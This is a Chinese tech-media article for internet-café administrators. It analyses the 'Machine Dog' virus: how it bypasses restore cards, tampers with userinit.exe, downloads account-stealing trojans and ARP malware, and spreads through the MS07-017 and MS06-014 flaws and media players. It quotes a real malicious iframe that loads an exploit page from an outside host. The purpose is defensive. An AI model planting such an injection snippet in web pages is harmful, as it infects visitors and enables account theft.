【IT168 专稿】最近一段时间,可以穿透市场上各种硬件还原卡,以及各种还原软件的"机器狗"病毒肆虐横行,着实让国内各网吧的网管忙活了一阵子。对于疯狂的"机器狗"病毒,杀毒软件厂商和一些硬件厂商也推出了解决方案,但收效甚微,不少网管同行戏称"机器狗"病毒的横行为网吧又一浩劫。从技术角度讲,再疯狂的病毒,也会有弱点,"机器狗"病毒也不例外,只要全面布防,消灭"机器狗"病毒并不难。
要想消灭"机器狗"病毒,必须对该病毒的历史及工作原理有一个非常全面的了解,这样才能找到防范方法。下面,我们来看一下"机器狗"病毒的历史和工作原理。
机器狗病毒终于让它趴下啦!(附:防arp攻击,防穿透,防疫和查毒程序)
"机器狗"病毒的产生原理
"机器狗"病毒的工作原理,首先通过pcihdd.sys驱动文件抢占还原软件的硬盘控制权,并修改用户初始化文件userinit.exe来实现隐藏自身的目的。由于病毒自动保存在系统中后,会定期从指定的网站下载各种木马程序,以截取上网用户的网络游戏帐号信息,为此,从技术角度讲,"机器狗"病毒被称为一个典型的网络架构木马型病毒。
最初,网吧的电脑感染了"机器狗"病毒之后,会威胁用户的帐号安全,因为病毒会自动下载一些盗号木马。不久之后,"机器狗"病毒有了新变种,该变种可以自动下载ARP欺骗病毒。更重要的是, "机器狗"病毒的新变种会对userinit.exe进行加密,并且对userinit.exe进行了加壳处理,使病毒具有更强的隐蔽性,致使一些防疫补丁对于"机器狗"的新变种失去了防范作用。
截至目前,"机器狗"病毒仍有新的变种产生。一个新变种的产生,则意味着部分防范措施将失效,如何防范"机器狗"病毒成为困扰网管的一个大难题。要想消灭"机器狗"病毒,必须仔细研究该病毒的各个变种,找出病毒的传播途径和弱点,这也是消灭该病毒需要努力的方向。
从"机器狗"形成查找病毒弱点
可以破坏还原卡或还原软件,这并不是"机器狗"病毒最具破坏力的地方,诡秘的传播方式,以及感染之后自动下载病毒制造者所定制的木马程序,这才是"机器狗"的罪大恶极之处。
在传播途径上,杀毒软件厂商经过研究后发现,"机器狗"病毒的传播主要是利用系统或应用软件的漏洞进行的。下面,笔者一一列举可以为"机器狗"病毒传播提供便捷通道的系统漏洞和应用软件漏洞。
MS07-017漏洞:最初,"机器狗"病毒是利用下面一段代码进行传播的,代码内容如下:<iframe src="http://xx.exiao01.com/2.htm" width="20" height="1" frameborder="0"></iframe>
病毒作者会将上述代码植入到各大网站中。查看被调用的2.htm的内容不难发现,病毒利用了操作系统的ANI漏洞加载木马,而这一过程恰恰是对微软操作系统MS07-017漏洞的"巧妙"应用。如果网吧机器没有安装MS07-017补丁,一旦访问了病毒代码,"机器狗"病毒便会不请自来。
MS06-014漏洞:这个漏洞是很多网管都熟悉的一个系统漏洞,即IE自动下载。如果系统存在该漏洞的话,一旦计算机访问到带有"机器狗"病毒代码的网页,会利用IE浏览器的自动下载并执行的漏洞,就这样,"机器狗"病毒就在计算机中安营扎寨。
在网吧的应用环境中,通过IE浏览器上网是每台计算机都有的操作,这无疑加大了感染"机器狗"病毒的机率。由于"机器狗"病毒是通过恶意代码进行传播的,也就是说,凡是可以执行网页代码的应用软件,都有可能成为"机器狗"病毒的传播渠道。
细数网吧的各种应用软件,影音播放软件也是"机器狗"病毒的一大传播通道。众所周知,不少病毒作者会将病毒代码植入影音文件中,一旦用户使用诸如Realplayer等支持网页浏览的播放软件,病毒代码就会被执行,计算机将会感染病毒。Realplayer播放器、百度搜霸、PPStream播放器,以及迅雷客户端,都是"机器狗"病毒传播可以利用的通道。
在实际应用中,如果能够利用技术手段切断"机器狗"病毒的传播,病毒自然不会去破坏网吧的还原系统,更不会自动下载木马程序。显然,要想消灭"机器狗"病毒,必须设法切断病毒的传播途径,这也是该病毒所谓的弱点。